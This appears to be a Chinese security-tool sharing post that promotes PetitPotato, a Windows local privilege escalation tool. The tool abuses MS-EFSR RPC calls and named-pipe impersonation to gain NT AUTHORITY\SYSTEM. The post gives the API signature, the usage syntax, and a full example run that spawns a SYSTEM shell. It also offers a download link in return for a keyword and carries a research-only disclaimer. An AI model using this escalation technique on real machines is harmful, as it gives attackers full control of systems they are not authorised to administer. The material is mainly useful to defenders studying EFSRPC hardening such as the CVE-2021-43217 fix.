日期:
来源:Hack分享吧收集编辑:点击关注
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
简介
描述
PetitPotam使用 MS-EFSR(远程加密文件系统),这是一种用于对远程存储和通过网络访问的加密数据执行维护和管理操作的协议。有一系列类似于EfsRpcOpenFileRawMS-EFSR 中的 API。API的语法EfsRpcOpenFileRaw如下所示。
long EfsRpcOpenFileRaw([in] handle_t binding_h,[out] PEXIMPORT_CONTEXT_HANDLE* hContext,[in, string] wchar_t* FileName,[in] long Flags);
此类 API 可以通过 FileName 参数指定 UNC 路径,以打开服务器上的加密对象以进行备份或还原。\\IP\C$当指定格式的路径时,lsass.exe 服务将以帐户\\IP\pipe\srvsvc权限访问NT AUTHORITY SYSTEM。
用法
PetitPotato.exe [EfsID] [Command]EfsID:要使用的 MS-EFSR API 编号 Command: 要执行的命令
例子
C:\Users\Administrator\Desktop>PetitPotato.exe 3 cmd.exe[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.[+] The connection is successful.[+] ImpersonateNamedPipeClient OK.[+] OpenThreadToken OK.[+] DuplicateTokenEx OK.[+] CreateProcessAsUser OK.Microsoft Windows [Version 10.0.20348.1547](c) 2019 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamint authority\systemC:\Windows\system32>
更新于 2023/03/14
2021 年 12 月,Microsoft 发布了针对不同 EFSRPC 漏洞的补丁:CVE-2021-43217。作为该问题补救措施的一部分,Microsoft 对 EFSRPC 通信实施了一些强化措施。特别是,EFSRPC 客户端在使用 EFSRPC 时需要使用 RPC_C_AUTHN_LEVEL_PKT_PRIVACY。如果客户端未能这样做,则客户端将被拒绝并生成 Windows 应用程序事件。
下载地址
回复关键字【230322】获取下载链接
往期推荐工具